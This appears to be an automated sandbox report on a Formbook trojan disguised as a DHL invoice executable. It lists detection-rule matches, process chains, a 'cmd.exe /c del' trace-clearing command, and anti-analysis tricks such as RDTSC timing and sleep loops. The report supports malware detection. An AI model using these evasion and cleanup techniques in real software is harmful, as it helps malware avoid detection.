Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 236, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cscript.exe PID: 1368, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@13/5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B37B5 GetLastError,FormatMessageW,

0_2_012B37B5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A10BF AdjustTokenPrivileges,CloseHandle,		0_2_012A10BF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_012A16C3

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_012B51CD

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012CA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_012CA67C

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012B648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_012B648E

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_012442A2

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\Temp\aut6C1C.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.v.c.h.o.s.t...e.x.e...........................B.......<.!.......!.....			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Console Write: ....................H.!.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$.s............,.!.............................&.................!.....			Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cscript.exe "C:\Windows\SysWOW64\cscript.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: van.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlanhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlanhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0BF754AA-C967-445C-AB3D-D8FDA9BAE7EF}\InProcServer32

Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static file information: File size 1120256 > 1048576

Source: C:\Windows\explorer.exe

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdb source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.348238153.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347630446.0000000002A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.356992362.0000000000720000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348109061.0000000000430000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.348482025.0000000000590000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.356992362.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868679723.0000000002080000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.357247442.0000000001EF0000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.356948769.0000000000560000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868679723.0000000002200000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: cscript.pdbN source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.869745021.000000000880F000.00000004.80000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.868627962.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.868865940.00000000028AF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: cscript.pdb source: svchost.exe, 00000002.00000002.356958657.00000000004B0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.356910306.0000000000214000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.868555182.0000000000350000.00000040.80000000.00040000.00000000.sdmp

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01260A76 push ecx; ret	0_2_01260A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004191ED push ecx; iretd	2_2_004191EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040F365 pushad ; ret	2_2_0040F36D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418389 push esp; iretd	2_2_0041838B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004164DA push edi; retf	2_2_004164FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4F2 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4FB push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D4A5 push eax; ret	2_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D55C push eax; ret	2_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00407726 push esp; iretd	2_2_00407729
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073DFA1 push ecx; ret	2_2_0073DFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038E9B5 push esp; retn 0000h	2_2_0038EAE7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038EB1E push esp; retn 0000h	2_2_0038EB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038EB02 push esp; retn 0000h	2_2_0038EB03
Source: C:\Windows\explorer.exe	Code function: 3_2_080E49B5 push esp; retn 0000h	3_2_080E4AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_080E4B02 push esp; retn 0000h	3_2_080E4B03
Source: C:\Windows\explorer.exe	Code function: 3_2_080E4B1E push esp; retn 0000h	3_2_080E4B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_090A0B02 push esp; retn 0000h	3_2_090A0B03
Source: C:\Windows\explorer.exe	Code function: 3_2_090A0B1E push esp; retn 0000h	3_2_090A0B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_090A09B5 push esp; retn 0000h	3_2_090A0AE7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035262B push ecx; ret	4_2_0035263E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209DFA1 push ecx; ret	4_2_0209DFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00080000 push C69438D7h; iretd	4_2_00080005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_000991ED push ecx; iretd	4_2_000991EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0008F365 pushad ; ret	4_2_0008F36D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00098389 push esp; iretd	4_2_0009838B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4A5 push eax; ret	4_2_0009D4F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_000964DA push edi; retf	4_2_000964FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4FB push eax; ret	4_2_0009D562
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4F2 push eax; ret	4_2_0009D4F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D55C push eax; ret	4_2_0009D562

Creates processes with suspicious names

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	File created: \commercail invoice and dhl awb tracking details.exe
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	File created: \commercail invoice and dhl awb tracking details.exe			Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0125F98E
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_012D1C41

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	API/Special instruction interceptor: Address: 1B3204
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731C25A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C1DA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BFBA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BFDA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C25A

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 89B6E second address: 89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4248	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5576	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 1595	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Window / User API: threadDelayed 1022	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Window / User API: threadDelayed 8948	Jump to behavior

Found decision node followed by non-executed suspicious APIs

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\cscript.exe	API coverage: 4.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\explorer.exe TID: 1964	Thread sleep time: -8496000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1340	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1964	Thread sleep time: -11152000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep count: 1022 > 30	Jump to behavior
